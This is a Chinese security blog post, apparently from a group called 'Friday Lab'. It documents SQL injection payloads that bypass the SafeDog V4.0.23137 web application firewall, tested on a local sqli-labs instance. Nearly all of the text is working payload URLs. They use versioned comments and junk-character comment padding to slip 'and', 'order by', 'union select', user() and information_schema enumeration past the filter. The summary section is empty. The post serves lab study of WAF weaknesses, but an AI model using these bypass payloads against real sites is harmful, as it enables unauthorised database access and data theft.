安全狗V4.0.23137 sql注入fuzz绕过
星期五实验室
阅读须知
01
环境搭建
server2012+安全狗+sqli-lab+phpstudy2018
测试链接:
http://10.30.3.209/sqli/Less-2/?id=1
02
测试过程
测试and被拦截
http://10.30.3.209/sqli/Less-2/?id=1%20and%201=1
回显正常
http://10.30.3.209/sqli/Less-2/?id=1%20 /*!10442and*/ %201=1
回显异常,存在注入点。
http://10.30.3.209/sqli/Less-2/?id=1%20 /*!10442and*/ %201=2
http://10.30.3.209/sqli/Less-2/?id=1 order by 1
/-`? &*~^
order by fuzz结果如下
http://10.30.3.209/sqli/Less-2/?id=1 order/*////*/ by 3
http://10.30.3.209/sqli/Less-2/?id=1 order/*////*/ by 4
fuzz结果如下
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/$---*/select%201,2,3
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/~---*/select%201,2,3
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/~--@*/select%201,2,3
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/`--&*/select%201,2,3
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,3
注释绕过敏感命令
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user()
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*%2f%60--%26*/()
fuzz结果如下
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/@//*/()
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/$//*/()
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*%2f%26%2f%2f*/()
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/~//*/()
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+33333%0ainformation_schema./*!schemata*/
fuzz结果如下
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/*-/%0ainformation_schema./*!schemata*/
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/%*-%0ainformation_schema./*!schemata*/
http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/*/*%0ainformation_schema./*!schemata*/
03
简单总结
FRIDAY LAB
星期五实验室
FRIDAY LAB